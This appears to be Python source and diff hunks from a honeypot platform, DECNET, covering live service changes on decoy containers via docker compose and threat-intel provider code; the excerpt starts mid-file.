    return topology_compose.write_topology_compose(hydrated, path)
|
||||
|
||||
|
||||
def _load_state():
    """Return whatever ``decnet.config.load_state()`` returns (lazy import)."""
    import decnet.config as decnet_config

    return decnet_config.load_state()
|
||||
|
||||
|
||||
def _save_state(config, compose_path) -> None:
    """Forward to ``decnet.config.save_state`` (lazy import)."""
    import decnet.config as decnet_config

    decnet_config.save_state(config, compose_path)
|
||||
|
||||
|
||||
def _write_compose(config, compose_path) -> None:
    """Forward to ``decnet.composer.write_compose`` (lazy import)."""
    import decnet.composer as composer_mod

    composer_mod.write_compose(config, compose_path)
|
||||
|
||||
|
||||
def _get_bus():
    """Return the bus object produced by ``decnet.bus.factory.get_bus`` (lazy import)."""
    import decnet.bus.factory as bus_factory

    return bus_factory.get_bus()
|
||||
|
||||
|
||||
# --------------------------- swarm propagation helpers ---------------------------
|
||||
#
|
||||
# Service mutations (add/remove/update_config) on a deployed decky used to run
|
||||
# the master's local docker-compose only. For swarm fleet deckies the master
|
||||
# has no containers; for agent-targeted topologies the master only writes a
|
||||
# compose file the worker never sees. These helpers replay the change to the
|
||||
# worker so the env actually lands.
|
||||
#
|
||||
# Lazy imports keep this module's import graph clean (composer/swarm pull in
|
||||
# decnet.network → docker, mirroring the pattern used elsewhere in this file).
|
||||
|
||||
|
||||
async def _fleet_decky_host_uuid(repo: BaseRepository, decky_name: str) -> Optional[str]:
    """Look up the ``host_uuid`` of the shard row whose ``decky_name`` matches.

    Scans ``repo.list_decky_shards()`` in order and returns the ``host_uuid``
    of the first matching row; returns ``None`` when no row matches.
    """
    rows = await repo.list_decky_shards()
    return next(
        (row.get("host_uuid") for row in rows if row.get("decky_name") == decky_name),
        None,
    )
|
||||
|
||||
|
||||
async def _redispatch_fleet_shard(repo: BaseRepository, host_uuid: str) -> None:
    """Send the deckies assigned to *host_uuid* through ``dispatch_decnet_config``.

    Loads the master's fleet state, keeps only the deckies whose
    ``host_uuid`` attribute equals *host_uuid*, and dispatches a copy of the
    config restricted to them. Logs a warning and returns without
    dispatching when there is no fleet state or no decky for that host.

    NOTE(review): what the worker does with the dispatched config (which
    containers it recreates) is decided outside this module — confirm
    against ``api_deploy_swarm``.
    """
    from decnet.web.router.swarm.api_deploy_swarm import dispatch_decnet_config

    loaded = _load_state()
    if loaded is None:
        log.warning("redispatch_fleet_shard: no fleet state on master; skipping")
        return

    fleet_config, _ = loaded
    shard = [
        decky
        for decky in fleet_config.deckies
        if getattr(decky, "host_uuid", None) == host_uuid
    ]
    if shard:
        await dispatch_decnet_config(
            fleet_config.model_copy(update={"deckies": shard}), repo,
        )
        return
    log.warning(
        "redispatch_fleet_shard: master state has no deckies for host=%s; skipping",
        host_uuid,
    )
|
||||
|
||||
|
||||
async def _resync_agent_topology(repo: BaseRepository, topology_id: str) -> None:
    """Call the deployer's ``resync_agent_topology`` for agent-pinned topologies.

    The topology is hydrated first; nothing happens when it cannot be
    hydrated or when its ``topology.target_host_uuid`` is empty (the local
    compose file is authoritative in that case).
    """
    from decnet.engine.deployer import resync_agent_topology as push_to_agent

    snapshot = await hydrate(repo, topology_id)
    pinned_host = (
        None if snapshot is None
        else snapshot.get("topology", {}).get("target_host_uuid")
    )
    if pinned_host:
        await push_to_agent(repo, topology_id)
|
||||
|
||||
|
||||
log = get_logger("engine.services_live")
|
||||
|
||||
DeckyKind = Literal["fleet", "topology"]
|
||||
|
||||
|
||||
class ServiceMutationError(ValueError):
    """Base error for service mutations the caller can correct.

    The API layer picks a 4xx status from the concrete subclass; an instance
    of this base class itself is reported as 422.
    """
|
||||
|
||||
|
||||
class ServiceNotFoundError(ServiceMutationError):
    """The referenced decky or topology does not exist (reported as 404)."""
|
||||
|
||||
|
||||
class ServiceConflictError(ServiceMutationError):
    """The service is already on, or not on, the decky (reported as 409)."""
|
||||
|
||||
|
||||
def _validate_service_for_per_decky(name: str) -> BaseService:
    """Return the registered service *name*, or raise ``ServiceMutationError``.

    Two cases are rejected:

    * the registry does not know *name* — whether it signals that by raising
      ``KeyError`` or by returning ``None``;
    * the service is flagged ``fleet_singleton``. Such services are rejected
      for per-decky add/remove instead of silently producing a no-op
      compose entry.

    Raises:
        ServiceMutationError: for either rejection above.
    """
    try:
        svc = get_service(name)
    except KeyError as exc:
        raise ServiceMutationError(f"unknown service {name!r}") from exc
    if svc is None:
        # Other callers of get_service() test its result for None, so treat
        # that the same as "unknown" instead of failing on attribute access.
        raise ServiceMutationError(f"unknown service {name!r}")
    if svc.fleet_singleton:
        raise ServiceMutationError(
            f"service {name!r} is fleet_singleton; not addable per-decky"
        )
    return svc
|
||||
|
||||
|
||||
async def _publish(topic: str, payload: dict[str, Any]) -> None:
    """Publish *payload* on *topic*, logging instead of raising on failure.

    A bus handle is obtained from ``_get_bus()``, connected, used for one
    publish and closed again. Any exception along the way is downgraded to a
    warning so a bus problem never fails the mutation that triggered it.
    """
    try:
        bus = _get_bus()
        await bus.connect()
        try:
            await bus.publish(topic, payload)
        finally:
            # Close even when publish raises, so a failed publish does not
            # leave the connection opened above dangling.
            await bus.close()
    except Exception as e:  # noqa: BLE001
        log.warning("services_live bus publish failed topic=%s err=%s", topic, e)
|
||||
|
||||
|
||||
# ---------------------------------------------------------- topology path
|
||||
|
||||
|
||||
async def _topology_decky(
    repo: BaseRepository, topology_id: str, decky_name: str,
) -> dict[str, Any]:
    """Return the hydrated decky row named *decky_name* in *topology_id*.

    A row's name is ``decky_config["name"]`` when that is set and truthy,
    otherwise the row's own ``name`` key. The first matching row wins.

    Raises:
        ServiceNotFoundError: the topology cannot be hydrated, or no row in
            it carries that name.
    """
    snapshot = await hydrate(repo, topology_id)
    if snapshot is None:
        raise ServiceNotFoundError(f"topology {topology_id!r} not found")

    def _effective_name(row: dict[str, Any]) -> Any:
        return (row.get("decky_config") or {}).get("name") or row.get("name")

    match = next(
        (row for row in snapshot["deckies"] if _effective_name(row) == decky_name),
        None,
    )
    if match is None:
        raise ServiceNotFoundError(
            f"decky {decky_name!r} is not in topology {topology_id!r}"
        )
    return match
|
||||
|
||||
|
||||
async def _rerender_topology_compose(
    repo: BaseRepository, topology_id: str,
) -> Path:
    """Hydrate *topology_id* again and rewrite its compose file.

    Run after the DB row has been updated so the file on disk describes the
    new service set; otherwise a later ``up -d`` would bring a removed
    service back. Returns the path that was written.

    Raises:
        ServiceNotFoundError: the topology can no longer be hydrated.
    """
    snapshot = await hydrate(repo, topology_id)
    if snapshot is None:  # pragma: no cover — narrow race
        raise ServiceNotFoundError(
            f"topology {topology_id!r} disappeared mid-mutation"
        )
    compose_path = _topology_compose_path(topology_id)
    _write_topology_compose(snapshot, compose_path)
    return compose_path
|
||||
|
||||
|
||||
async def _add_topology_service(
    repo: BaseRepository,
    topology_id: str,
    decky_name: str,
    service_name: str,
    initial_config: dict | None = None,
) -> list[str]:
    """Append *service_name* to a topology decky and bring it up.

    The decky row is updated first (services list, plus
    ``decky_config.service_config[service_name]`` when *initial_config* is
    truthy), then the compose file is re-rendered so the first ``up``
    already carries that config. Agent-pinned topologies are re-synced to
    the worker; otherwise ``up -d --no-deps --build <decky>-<service>`` is
    run in a worker thread.

    Returns the post-mutation services list.

    Raises:
        ServiceConflictError: the service is already on the decky.
    """
    row = await _topology_decky(repo, topology_id, decky_name)
    services: list[str] = list(row.get("services") or [])
    if service_name in services:
        raise ServiceConflictError(
            f"service {service_name!r} already on decky {decky_name!r}"
        )
    services.append(service_name)

    changes: dict[str, Any] = {"services": services}
    if initial_config:
        blob = dict(row.get("decky_config") or {})
        per_service = dict(blob.get("service_config") or {})
        per_service[service_name] = initial_config
        blob["service_config"] = per_service
        changes["decky_config"] = blob
    await repo.update_topology_decky(row["uuid"], changes)

    compose_path = await _rerender_topology_compose(repo, topology_id)
    if await _topology_is_agent_pinned(repo, topology_id):
        # Nothing to start locally; hand the new state to the worker.
        await _resync_agent_topology(repo, topology_id)
        return services

    container = f"{decky_name}-{service_name}"

    def _bring_up() -> None:
        _compose(
            "up", "-d", "--no-deps", "--build", container,
            compose_file=compose_path,
        )

    # Compose blocks, so keep it off the event loop.
    await anyio.to_thread.run_sync(_bring_up)
    return services
|
||||
|
||||
|
||||
async def _topology_is_agent_pinned(repo: BaseRepository, topology_id: str) -> bool:
    """Report whether the hydrated topology has a truthy ``target_host_uuid``.

    A topology that cannot be hydrated counts as not pinned.
    """
    snapshot = await hydrate(repo, topology_id)
    return snapshot is not None and bool(
        snapshot.get("topology", {}).get("target_host_uuid")
    )
|
||||
|
||||
|
||||
async def _remove_topology_service(
    repo: BaseRepository,
    topology_id: str,
    decky_name: str,
    service_name: str,
) -> list[str]:
    """Drop *service_name* from a topology decky and tear its container down.

    For a locally deployed topology the container is stopped and removed
    before anything is persisted, so a compose failure leaves both the
    container and the DB row untouched for a retry. The decky row and the
    compose file are then updated. Agent-pinned topologies skip the local
    compose calls and are re-synced to the worker after the update.

    Returns the post-mutation services list.

    Raises:
        ServiceConflictError: the service is not on the decky.
    """
    row = await _topology_decky(repo, topology_id, decky_name)
    current: list[str] = list(row.get("services") or [])
    if service_name not in current:
        raise ServiceConflictError(
            f"service {service_name!r} not on decky {decky_name!r}"
        )
    remaining = [svc for svc in current if svc != service_name]
    container = f"{decky_name}-{service_name}"
    compose_path = _topology_compose_path(topology_id)
    pinned = await _topology_is_agent_pinned(repo, topology_id)

    if not pinned:
        def _stop() -> None:
            _compose("stop", container, compose_file=compose_path)

        def _remove() -> None:
            _compose("rm", "-f", container, compose_file=compose_path)

        await anyio.to_thread.run_sync(_stop)
        await anyio.to_thread.run_sync(_remove)

    await repo.update_topology_decky(row["uuid"], {"services": remaining})
    await _rerender_topology_compose(repo, topology_id)

    if pinned:
        # The worker receives the updated topology, now without the service.
        await _resync_agent_topology(repo, topology_id)
    return remaining
|
||||
|
||||
|
||||
# ---------------------------------------------------------- fleet path
|
||||
|
||||
|
||||
def _fleet_state_or_raise() -> tuple[Any, Path]:
    """Return the loaded fleet state, or raise when there is none.

    Raises:
        ServiceMutationError: ``_load_state()`` returned ``None``.
    """
    loaded = _load_state()
    if loaded is not None:
        return loaded
    raise ServiceMutationError(
        "no fleet state on disk — run `decnet up` first"
    )
|
||||
|
||||
|
||||
def _fleet_find_decky(config: Any, decky_name: str) -> Any:
    """Return the first entry of ``config.deckies`` whose ``name`` is *decky_name*.

    Raises:
        ServiceNotFoundError: no decky carries that name.
    """
    found = next(
        (candidate for candidate in config.deckies if candidate.name == decky_name),
        None,
    )
    if found is None:
        raise ServiceNotFoundError(f"fleet decky {decky_name!r} not found")
    return found
|
||||
|
||||
|
||||
async def _persist_fleet_change(
    repo: BaseRepository, decky: Any, services: list[str], compose_path: Path,
) -> None:
    """Persist a fleet decky mutation to JSON state, compose file and DB row.

    State is re-loaded here and the change applied to the freshly loaded
    decky, which is then saved, rendered to *compose_path* and mirrored to
    the ``fleet_deckies`` row so DB-only consumers see it immediately.

    Args:
        repo: repository used for the DB mirror.
        decky: the caller's decky object; its ``name``, ``ip``,
            ``host_uuid`` and any ``service_config`` entries are read.
        services: the post-mutation services list.
        compose_path: compose file to rewrite.

    Raises:
        ServiceMutationError: fleet state is no longer on disk.
        ServiceNotFoundError: the decky is missing from the re-loaded state.
    """
    # Go through the raising helper so missing state surfaces as a
    # ServiceMutationError rather than a TypeError from unpacking None.
    config, _ = _fleet_state_or_raise()
    target = _fleet_find_decky(config, decky.name)
    target.services = services

    # The caller may have stashed per-service config on its own decky object
    # (e.g. the initial config of a service being added). ``target`` comes
    # from a separate load, so carry those entries over — otherwise they
    # never reach the saved state, the compose file or the DB row.
    pending_cfg = getattr(decky, "service_config", None)
    if pending_cfg:
        merged = dict(getattr(target, "service_config", None) or {})
        merged.update(pending_cfg)
        target.service_config = merged

    _save_state(config, compose_path)
    _write_compose(config, compose_path)

    from decnet.web.db.models import LOCAL_HOST_SENTINEL
    await repo.upsert_fleet_decky({
        "host_uuid": getattr(decky, "host_uuid", None) or LOCAL_HOST_SENTINEL,
        "name": decky.name,
        "services": services,
        "decky_config": target.model_dump(mode="json"),
        "decky_ip": decky.ip,
        "state": "running",
    })
|
||||
|
||||
|
||||
async def _add_fleet_service(
    repo: BaseRepository,
    decky_name: str,
    service_name: str,
    initial_config: dict | None = None,
) -> list[str]:
    """Append *service_name* to a fleet decky and materialise it.

    A truthy *initial_config* is stored under
    ``decky.service_config[service_name]`` before the change is persisted.
    When the decky has a shard row with a host uuid, that host's shard is
    re-dispatched to its worker; otherwise
    ``up -d --no-deps --build <decky>-<service>`` runs locally in a worker
    thread.

    Returns the post-mutation services list.

    Raises:
        ServiceConflictError: the service is already on the decky.
    """
    config, compose_path = _fleet_state_or_raise()
    decky = _fleet_find_decky(config, decky_name)
    services: list[str] = list(decky.services or [])
    if service_name in services:
        raise ServiceConflictError(
            f"service {service_name!r} already on decky {decky_name!r}"
        )
    services.append(service_name)

    if initial_config:
        per_service = dict(getattr(decky, "service_config", None) or {})
        per_service[service_name] = initial_config
        decky.service_config = per_service

    await _persist_fleet_change(repo, decky, services, compose_path)

    swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
    if swarm_host_uuid:
        # No local container for this decky: let the worker create it.
        await _redispatch_fleet_shard(repo, swarm_host_uuid)
        return services

    container = f"{decky_name}-{service_name}"

    def _bring_up() -> None:
        _compose(
            "up", "-d", "--no-deps", "--build", container,
            compose_file=compose_path,
        )

    await anyio.to_thread.run_sync(_bring_up)
    return services
|
||||
|
||||
|
||||
async def _remove_fleet_service(
    repo: BaseRepository, decky_name: str, service_name: str,
) -> list[str]:
    """Drop *service_name* from a fleet decky and tear its container down.

    For a local decky the container is stopped and removed before the change
    is persisted, so a compose failure leaves a clear state to retry from.
    For a decky with a shard host uuid the local compose calls are skipped
    and the host's shard is re-dispatched after persisting.

    Returns the post-mutation services list.

    Raises:
        ServiceConflictError: the service is not on the decky.
    """
    config, compose_path = _fleet_state_or_raise()
    decky = _fleet_find_decky(config, decky_name)
    current: list[str] = list(decky.services or [])
    if service_name not in current:
        raise ServiceConflictError(
            f"service {service_name!r} not on decky {decky_name!r}"
        )
    remaining = [svc for svc in current if svc != service_name]
    container = f"{decky_name}-{service_name}"

    swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
    if not swarm_host_uuid:
        def _stop() -> None:
            _compose("stop", container, compose_file=compose_path)

        def _remove() -> None:
            _compose("rm", "-f", container, compose_file=compose_path)

        await anyio.to_thread.run_sync(_stop)
        await anyio.to_thread.run_sync(_remove)

    await _persist_fleet_change(repo, decky, remaining, compose_path)

    if swarm_host_uuid:
        await _redispatch_fleet_shard(repo, swarm_host_uuid)
    return remaining
|
||||
|
||||
|
||||
# ---------------------------------------------------------- public api
|
||||
|
||||
|
||||
async def add_service(
    repo: BaseRepository,
    *,
    decky_kind: DeckyKind,
    decky_name: str,
    service_name: str,
    topology_id: Optional[str] = None,
    config: dict | None = None,
) -> list[str]:
    """Add *service_name* to a deployed decky and announce it on the bus.

    The service name is checked against the registry (unknown and
    fleet_singleton names are rejected) and a truthy *config* is passed
    through the service's ``validate_cfg`` before any state is written, so
    a validation failure has no side effects. The work is then handed to
    the topology or fleet implementation and
    ``decky.<name>.service.added`` is published.

    Returns the post-mutation services list.

    Raises:
        ServiceMutationError: invalid service, or ``decky_kind="topology"``
            without a ``topology_id``.
    """
    svc = _validate_service_for_per_decky(service_name)
    initial_config = svc.validate_cfg(config) if config else {}

    if decky_kind == "fleet":
        services = await _add_fleet_service(
            repo, decky_name, service_name,
            initial_config=initial_config,
        )
    elif decky_kind == "topology":
        if not topology_id:
            raise ServiceMutationError(
                "decky_kind=topology requires topology_id",
            )
        services = await _add_topology_service(
            repo, topology_id, decky_name, service_name,
            initial_config=initial_config,
        )
    else:  # pragma: no cover — Literal narrows
        raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")

    event = {
        "decky_name": decky_name,
        "service_name": service_name,
        "topology_id": topology_id,
        "services": services,
    }
    await _publish(topics.decky(decky_name, topics.DECKY_SERVICE_ADDED), event)
    log.info(
        "services_live.add decky=%s topology=%s service=%s",
        decky_name, topology_id, service_name,
    )
    return services
|
||||
|
||||
|
||||
async def update_service_config(
    repo: BaseRepository,
    *,
    decky_kind: DeckyKind,
    decky_name: str,
    service_name: str,
    cfg: dict,
    apply: bool = False,
    topology_id: Optional[str] = None,
) -> dict:
    """Store *cfg* as the decky's ``service_config[service_name]``.

    *cfg* goes through the service's ``validate_cfg`` before anything is
    written, so a validation failure has no side effects.

    With ``apply=False`` only the persisted state and compose file change;
    the running container is left alone. With ``apply=True`` the
    ``<decky>-<service>`` container is additionally force-recreated (or the
    change is pushed to the worker) so the new config takes effect, which
    discards whatever state lived inside that container.

    A ``decky.<name>`` config-changed event is published afterwards.

    Returns the validated config.

    Raises:
        ServiceMutationError: invalid service, or ``decky_kind="topology"``
            without a ``topology_id``.
    """
    svc = _validate_service_for_per_decky(service_name)
    validated = svc.validate_cfg(cfg)

    if decky_kind == "fleet":
        await _update_fleet_service_config(
            repo, decky_name, service_name, validated, apply=apply,
        )
    elif decky_kind == "topology":
        if not topology_id:
            raise ServiceMutationError(
                "decky_kind=topology requires topology_id",
            )
        await _update_topology_service_config(
            repo, topology_id, decky_name, service_name, validated, apply=apply,
        )
    else:  # pragma: no cover
        raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")

    event = {
        "decky_name": decky_name,
        "service_name": service_name,
        "topology_id": topology_id,
        "service_config": validated,
        "recreated": bool(apply),
    }
    await _publish(
        topics.decky(decky_name, topics.DECKY_SERVICE_CONFIG_CHANGED), event,
    )
    log.info(
        "services_live.update_config decky=%s topology=%s service=%s apply=%s",
        decky_name, topology_id, service_name, apply,
    )
    return validated
|
||||
|
||||
|
||||
async def _update_topology_service_config(
    repo: BaseRepository,
    topology_id: str,
    decky_name: str,
    service_name: str,
    validated: dict,
    *,
    apply: bool,
) -> None:
    """Write *validated* into a topology decky's service config.

    The decky row's ``decky_config.service_config[service_name]`` is
    replaced and the compose file re-rendered. When *apply* is true the
    change is also made live: agent-pinned topologies are re-synced to the
    worker, others get ``up -d --no-deps --force-recreate --build`` on
    ``<decky>-<service>`` in a worker thread.

    Raises:
        ServiceConflictError: the service is not on the decky.
    """
    row = await _topology_decky(repo, topology_id, decky_name)
    if service_name not in (row.get("services") or []):
        raise ServiceConflictError(
            f"service {service_name!r} not on decky {decky_name!r}"
        )

    blob = dict(row.get("decky_config") or {})
    per_service = dict(blob.get("service_config") or {})
    per_service[service_name] = validated
    blob["service_config"] = per_service
    await repo.update_topology_decky(row["uuid"], {"decky_config": blob})

    compose_path = await _rerender_topology_compose(repo, topology_id)
    if not apply:
        return
    if await _topology_is_agent_pinned(repo, topology_id):
        await _resync_agent_topology(repo, topology_id)
        return

    container = f"{decky_name}-{service_name}"

    def _recreate() -> None:
        _compose(
            "up", "-d", "--no-deps", "--force-recreate", "--build", container,
            compose_file=compose_path,
        )

    await anyio.to_thread.run_sync(_recreate)
|
||||
|
||||
|
||||
async def _update_fleet_service_config(
    repo: BaseRepository,
    decky_name: str,
    service_name: str,
    validated: dict,
    *,
    apply: bool,
) -> None:
    """Store a validated service config on a fleet decky; optionally apply it.

    The fleet state is loaded with ``_fleet_state_or_raise``; *validated* is
    written to ``decky.service_config[service_name]``, the state and compose
    file are rewritten, and the decky row is upserted through *repo* with
    state ``"running"``. When *apply* is true, a decky that resolves to a
    swarm host has its shard re-dispatched; otherwise the local
    ``<decky>-<service>`` container is removed and recreated via compose.

    Raises:
        ServiceConflictError: *service_name* is not in the decky's services.
    """
    fleet_config, compose_file = _fleet_state_or_raise()
    member = _fleet_find_decky(fleet_config, decky_name)
    if service_name not in (member.services or []):
        raise ServiceConflictError(
            f"service {service_name!r} not on decky {decky_name!r}"
        )

    # Copy before mutating so the previous mapping object is not shared.
    per_service = dict(getattr(member, "service_config", None) or {})
    per_service[service_name] = validated
    member.service_config = per_service
    _save_state(fleet_config, compose_file)
    _write_compose(fleet_config, compose_file)

    from decnet.web.db.models import LOCAL_HOST_SENTINEL

    db_row = {
        "host_uuid": getattr(member, "host_uuid", None) or LOCAL_HOST_SENTINEL,
        "name": member.name,
        "services": list(member.services or []),
        "decky_config": member.model_dump(mode="json"),
        "decky_ip": member.ip,
        "state": "running",
    }
    await repo.upsert_fleet_decky(db_row)
    if not apply:
        return

    remote_host = await _fleet_decky_host_uuid(repo, decky_name)
    if remote_host:
        await _redispatch_fleet_shard(repo, remote_host)
        return

    container = f"{decky_name}-{service_name}"

    def _drop_stale_container():
        # Docker Compose tracks the previous container by ID. If that
        # container was already removed (or renamed during a prior failed
        # deploy), --force-recreate fails with "No such container". Remove
        # by name first so Compose starts from a clean slate. The result is
        # intentionally ignored (best effort).
        return subprocess.run(  # nosec B603 B607
            ["docker", "rm", "-f", container],
            capture_output=True,
        )

    def _recreate():
        return _compose(
            "up", "-d", "--no-deps", "--force-recreate", "--build", container,
            compose_file=compose_file,
        )

    # Both steps block, so each runs in a worker thread, strictly in order.
    await anyio.to_thread.run_sync(_drop_stale_container)
    await anyio.to_thread.run_sync(_recreate)
|
||||
|
||||
|
||||
async def remove_service(
    repo: BaseRepository,
    *,
    decky_kind: DeckyKind,
    decky_name: str,
    service_name: str,
    topology_id: Optional[str] = None,
) -> list[str]:
    """Remove *service_name* from a deployed decky.

    The actual removal is delegated to ``_remove_topology_service`` or
    ``_remove_fleet_service`` depending on *decky_kind*. Afterwards a
    ``DECKY_SERVICE_REMOVED`` event carrying the remaining services is
    published on the decky's topic and the operation is logged.

    Returns:
        The post-mutation services list, as returned by the helper.

    Raises:
        ServiceMutationError: *decky_kind* is ``"topology"`` without a
            *topology_id*, or *decky_kind* is not a known kind.
    """
    if decky_kind == "fleet":
        remaining = await _remove_fleet_service(repo, decky_name, service_name)
    elif decky_kind == "topology":
        if not topology_id:
            raise ServiceMutationError(
                "decky_kind=topology requires topology_id",
            )
        remaining = await _remove_topology_service(
            repo, topology_id, decky_name, service_name,
        )
    else:  # pragma: no cover
        raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")

    topic = topics.decky(decky_name, topics.DECKY_SERVICE_REMOVED)
    event = {
        "decky_name": decky_name,
        "service_name": service_name,
        "topology_id": topology_id,
        "services": remaining,
    }
    await _publish(topic, event)
    log.info(
        "services_live.remove decky=%s topology=%s service=%s",
        decky_name, topology_id, service_name,
    )
    return remaining
|
||||
@@ -91,7 +91,7 @@ DECNET_API_PORT: int = _port("DECNET_API_PORT", 8000)
|
||||
# DECNET_JWT_SECRET is resolved lazily via module __getattr__ so that agent /
|
||||
# updater / swarmctl subcommands (which never touch auth) can start without
|
||||
# the master's JWT secret being present in the environment.
|
||||
DECNET_INGEST_LOG_FILE: str = os.environ.get("DECNET_INGEST_LOG_FILE", "/var/log/decnet/decnet.log")
|
||||
DECNET_INGEST_LOG_FILE: str | None = os.environ.get("DECNET_INGEST_LOG_FILE", "/var/log/decnet/decnet.log")
|
||||
|
||||
# Agent-side RFC 5424 sink written by decnet.collector.worker when run on
|
||||
# a SWARM worker. The forwarder tails this file and ships lines over
|
||||
@@ -114,11 +114,6 @@ DECNET_SWARM_MASTER_HOST: str | None = os.environ.get("DECNET_SWARM_MASTER_HOST"
|
||||
DECNET_HOST_UUID: str | None = os.environ.get("DECNET_HOST_UUID")
|
||||
DECNET_MASTER_HOST: str | None = os.environ.get("DECNET_MASTER_HOST")
|
||||
DECNET_SWARMCTL_PORT: int = _port("DECNET_SWARMCTL_PORT", 8770)
|
||||
# Bind address for the master-side swarm controller. Loopback by default —
|
||||
# operators flip to 0.0.0.0 (or a specific NIC) on production masters where
|
||||
# workers heartbeat in over mTLS from other hosts. Seeded by [swarm]
|
||||
# swarmctl-host in /etc/decnet/decnet.ini.
|
||||
DECNET_SWARMCTL_HOST: str = os.environ.get("DECNET_SWARMCTL_HOST", "127.0.0.1")
|
||||
|
||||
# Ingester batching: how many log rows to accumulate per commit, and the
|
||||
# max wait (ms) before flushing a partial batch. Larger batches reduce
|
||||
|
||||
@@ -128,6 +128,8 @@ async def reconcile_once(
|
||||
container_states = await asyncio.to_thread(
|
||||
_collect_container_states, docker_client_factory,
|
||||
)
|
||||
docker_known = container_states is not None
|
||||
|
||||
json_names = {d.name for d in json_deckies}
|
||||
|
||||
# 1. INSERT: present in JSON, absent from DB.
|
||||
@@ -136,7 +138,7 @@ async def reconcile_once(
|
||||
continue
|
||||
new_state = (
|
||||
_aggregate_decky_state(d.name, list(d.services), container_states)
|
||||
if container_states is not None else "running"
|
||||
if docker_known else "running"
|
||||
)
|
||||
row_host = d.host_uuid or host_uuid
|
||||
await repo.upsert_fleet_decky({
|
||||
@@ -166,7 +168,7 @@ async def reconcile_once(
|
||||
)
|
||||
|
||||
# 3. STATE: present in both, docker says something fresh.
|
||||
if container_states is not None:
|
||||
if docker_known:
|
||||
for d in json_deckies:
|
||||
existing = db_by_name.get(d.name)
|
||||
if existing is None:
|
||||
|
||||
@@ -9,7 +9,7 @@ from decnet.geoip.base import Provider
|
||||
from decnet.geoip.lookup import Lookup
|
||||
from decnet.geoip.paths import ensure_root
|
||||
from decnet.geoip.rir.fetch import RIR_SOURCES, fetch_all
|
||||
from decnet.geoip.rir.parse import Range, parse_file
|
||||
from decnet.geoip.rir.parse import parse_file
|
||||
|
||||
logger = logging.getLogger("decnet.geoip.rir.provider")
|
||||
|
||||
@@ -45,7 +45,7 @@ class RirProvider(Provider):
|
||||
except Exception as exc:
|
||||
logger.warning("geoip.rir: cache load failed, rebuilding: %s", exc)
|
||||
|
||||
ranges: list[Range] = []
|
||||
ranges = []
|
||||
for path in self.data_paths():
|
||||
if not path.exists():
|
||||
continue
|
||||
|
||||
@@ -17,6 +17,7 @@ later if operators report drift.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import os
|
||||
from datetime import datetime, timezone
|
||||
from typing import Optional
|
||||
@@ -92,25 +93,12 @@ class AbuseIPDBProvider(IntelProvider):
|
||||
data = payload.get("data") or {}
|
||||
score = int(data.get("abuseConfidenceScore") or 0)
|
||||
verdict = _score_to_verdict(score)
|
||||
# AbuseIPDB returns ``data.reports[*].categories`` — a list of
|
||||
# int codes per report. Flatten the union across all recent
|
||||
# reports so the IntelLifter sees the full activity profile,
|
||||
# not just the most-recent report's categories. Sorted for
|
||||
# determinism (matters for tests + for the bus payload diff).
|
||||
categories: set[int] = set()
|
||||
for report in data.get("reports") or []:
|
||||
if not isinstance(report, dict):
|
||||
continue
|
||||
for cat in report.get("categories") or []:
|
||||
if isinstance(cat, int):
|
||||
categories.add(cat)
|
||||
return IntelResult(
|
||||
provider=self.name,
|
||||
verdict=verdict,
|
||||
column_updates={
|
||||
"abuseipdb_score": score,
|
||||
"abuseipdb_categories": sorted(categories),
|
||||
"abuseipdb_raw": data,
|
||||
"abuseipdb_raw": json.dumps(data),
|
||||
"abuseipdb_queried_at": datetime.now(timezone.utc),
|
||||
},
|
||||
)
|
||||
|
||||
@@ -78,33 +78,3 @@ class IntelProvider(ABC):
|
||||
entire IP. Implementations should also respect
|
||||
``self._semaphore`` to bound in-flight calls.
|
||||
"""
|
||||
|
||||
|
||||
class MalHashProvider(ABC):
    """Interface for providers that answer "is this file hash known bad?".

    Deliberately separate from :class:`IntelProvider`: the key is a file
    SHA-256 rather than an IP, and the consumer is the email ingester at
    observation time rather than the IP-keyed intel-worker fan-out. Keeping
    two ABCs lets ``IntelProvider.lookup(ip)`` keep its IP-only meaning.

    Current implementation:

    * :class:`decnet.intel.mal_hash.MalwareBazaarProvider` — bulk-feed
      provider shaped like :class:`decnet.intel.feodo.FeodoProvider`.

    Further implementations (a paid VirusTotal subscription, an in-house
    allowlist) are meant to be wired in through
    :func:`decnet.intel.factory.get_mal_hash_provider`.
    """

    # Short provider identifier; concrete subclasses set it.
    name: str

    @abstractmethod
    async def is_known_bad(self, sha256: str) -> bool:
        """Report whether *sha256* appears on this provider's bad-hash list.

        Implementations MUST NOT raise: on any error they return ``False``
        and log the problem themselves. The caller is the ingester, and an
        exception here would taint an unrelated bus payload.
        """
        raise NotImplementedError
|
||||
|
||||
@@ -21,7 +21,7 @@ from __future__ import annotations
|
||||
import os
|
||||
from typing import List
|
||||
|
||||
from decnet.intel.base import IntelProvider, MalHashProvider
|
||||
from decnet.intel.base import IntelProvider
|
||||
|
||||
_KNOWN_PROVIDERS = ("greynoise", "abuseipdb", "feodo", "threatfox")
|
||||
|
||||
@@ -37,40 +37,6 @@ def _provider_list() -> list[str]:
|
||||
return [p.strip().lower() for p in raw.split(",") if p.strip()]
|
||||
|
||||
|
||||
_mal_hash_singleton: MalHashProvider | None = None
|
||||
_mal_hash_initialized: bool = False
|
||||
|
||||
|
||||
def get_mal_hash_provider() -> MalHashProvider | None:
    """Return the process-wide malware-hash lookup provider.

    Counterpart of :func:`get_intel_providers` for the file-SHA-256 keyspace
    (consumed by the email ingester, not the IP-keyed intel worker).

    The result is computed once and cached in module globals: ``None`` when
    ``_enabled()`` is false, otherwise a ``MalwareBazaarProvider`` instance.
    Per that provider's documentation it turns itself into a no-op when
    ``DECNET_MALWAREBAZAAR_AUTH_KEY`` is unset, so callers never need to
    special-case "no provider configured".
    """
    global _mal_hash_singleton, _mal_hash_initialized
    if not _mal_hash_initialized:
        # Flag first: the decision is made at most once per process, even if
        # constructing the provider below raises.
        _mal_hash_initialized = True
        if _enabled():
            # Imported lazily, only when a provider is actually built.
            from decnet.intel.mal_hash import MalwareBazaarProvider
            _mal_hash_singleton = MalwareBazaarProvider()
        else:
            _mal_hash_singleton = None
    return _mal_hash_singleton
|
||||
|
||||
|
||||
def _reset_mal_hash_provider_for_testing() -> None:
    """Test hook: forget the cached provider so the next lookup rebuilds it."""
